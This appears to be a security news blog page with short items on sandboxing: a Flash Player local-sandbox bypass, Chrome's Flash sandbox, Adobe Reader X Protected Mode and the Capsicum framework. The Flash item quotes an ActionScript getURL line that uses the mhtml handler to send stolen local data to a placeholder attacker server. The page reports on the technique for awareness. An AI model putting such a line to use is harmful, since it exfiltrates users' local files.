April 18, 2014

Bypass Flash Player Sandbox

Adobe Flash applications run locally can access to the local files and transfer them to the attacker server.

Adobe has implemented a number of sandboxes to enhance the user’s security. However, the imposed restrictions by sandboxes are depending to the origin and access rights of the SWF file. Hence, the local SWF files run within the local-with-file-system sandbox and are permitted to access to the local files without an access to the network.

However, the security researcher, Billy Rios has discovered that Adobe controls access to the network using a blacklist of protocols such as HTTP and HTTPS. Therefore, it is possible to send files to a server using the file: protocol handler. Nevertheless, this is only possible within the local area network.

Billy Rios has identified other protocol handler which can be used to send data to remote servers by mhtml and using the ActionScript command: getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”); from the victim PC.

Chrome to run Flash Player in a sandbox

The latest developer version (dev channel) of the Chrome browser for Windows is equipped with a sandbox for running Adobe’s Flash plug-in. If an attacker succeeds in exploiting a security vulnerability in the plug-in, the sandbox should cushion the worst of the blow by blocking access to critical system files. Abobe Flash Player is a godsend for attackers, because almost everyone has it installed on their system and new vulnerabilities in Flash are constantly being discovered.

Read the full story here.


Adobe Reader X with Windows Sandbox

Adobe Systems has added a new security layer to Windows versions of its document reader, Adobe Reader X by implementing Sandbox function.

The function, dubbed ‘Protected Mode’ by Adobe, blocks attempts by infected PDFs to write and execute code. It should also prevent infected files from making registry changes. Future versions will reportedly control read access to prevent attackers from reading confidential data from the file system.

According to Adobe blog, with Adobe Reader Protected Mode enabled (it will be by default), all operations required by Adobe Reader to display the PDF file to the user are run in a very restricted manner inside a confined environment, the “sandbox.” Should Adobe Reader need to perform an action that is not permitted in the sandboxed environment, such as writing to the user’s temporary folder or launching an attachment inside a PDF file using an external application (e.g. Microsoft Word), those requests are funneled through a “broker process,” which has a strict set of policies for what is allowed and disallowed to prevent access to dangerous functionality.

Adobe released version 9.4.1, which fixed more than 19 vulnerabilities a few days ago.

Download Adobe Reader X here.

Capsicum: New Sandbox Framework with OS Capability

Security researchers at University of Cambridge Computer Laboratory released a new sandbox framework.

According to the project website, Capsicum is a lightweight OS capability and sandbox framework developed at the University of Cambridge Computer Laboratory, supported by a grant from Google. Capsicum extends the POSIX API, providing several new OS primitives to support object-capability security on UNIX-like operating systems:

  • capabilities – refined file descriptors with fine-grained rights
  • capability mode – process sandboxes that deny access to global namespaces
  • process descriptors – capability-centric process ID replacement
  • anonymous shared memory objects – an extension to the POSIX shared memory API to support anonymous swap objects associated with file descriptors (capabilities)
  • rtld-elf-cap – modified ELF run-time linker to construct sandboxed applications
  • libcapsicum – library to create and use capabilities and sandboxed components
  • libuserangel – library allowing sandboxed applications or components to interact with user angels, such as Power Boxes.
  • chromium-capsicum – a version of Google’s Chromium web browser that uses capability mode and capabilities to provide effective sandboxing of high-risk web page rendering.

Capsicum has been prototyped on FreeBSD 8.x, and its experimental code is BSD-licensed to encourage open source, research, and commercial deployment.

Find more information about Capsicum here.